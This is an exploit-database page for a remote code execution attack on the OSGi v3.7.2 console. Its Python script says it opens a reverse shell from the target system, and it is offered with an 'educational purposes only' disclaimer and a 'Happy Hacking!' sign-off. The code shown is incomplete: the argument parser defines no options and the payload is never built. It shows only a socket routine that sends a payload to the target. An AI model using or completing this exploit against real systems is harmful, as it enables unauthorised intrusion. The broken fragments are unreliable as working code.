Exploits / Vulnerability Discovered : 2024-03-12 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Osgi v3.7.2 (and below) console rce is for educational purposes only and if it is used you will do on your own risk!
"""
This is an exploit that allows to open a reverse shell connection from
the system running OSGi v3.7.2 and earlier.
"""
import argparse
import base64
import socket
def parse():
"""
This fnction is used to parse and return command-line arguments.
"""
parser = argparse.ArgumentParser(
prog="OSGi-3.7.2-console-RCE",
description="This tool will let you open a reverse shell from the "
"system that is running OSGi with the '-console' "
"option in version 3.7.2 (or before).",
epilog="Happy Hacking! :)",
)
def deliver_payload(rhost, rport, payload):
"""
This function connects to the target host and delivers the payload.
It returns True if successful; False otherwise.
"""
print("(*) Sending payload...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((rhost, rport))
sock.send(payload)
sock.close()
except socket.error as err:
print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
print(err)
return False